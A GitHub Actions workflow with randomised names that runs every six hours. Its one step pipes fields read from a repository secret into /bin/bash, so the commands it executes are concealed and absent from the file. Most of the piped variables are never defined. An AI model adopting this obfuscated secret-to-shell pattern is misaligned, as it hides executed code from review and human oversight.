name: qiehuanqhx

on:
  workflow_dispatch:
  schedule:
    - cron: '14 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qiehuanqhx
        env:
          ug8: ${{ secrets.ug8 }}
        run: |
          echo $ug8 | jq -r .gq681 | /bin/bash
          echo $iecok0 | jq -r .hfiad8812 | /bin/bash
          echo $e5724 | jq -r .wt98 | /bin/bash
          echo $swkt81 | jq -r .uy16 | /bin/bash
          echo $iv3 | jq -r .wiqge0104 | /bin/bash
          echo $e8 | jq -r .nwcr3 | /bin/bash
          echo $e4281 | jq -r .bw52147 | /bin/bash
          echo $eddy297 | jq -r .pivvu64713 | /bin/bash
          echo $ubr972 | jq -r .ki112 | /bin/bash
          echo $kegew2601 | jq -r .huegf42 | /bin/bash
          echo $epp68147 | jq -r .cfwj3488 | /bin/bash
          echo $giqsm45347 | jq -r .v50236 | /bin/bash

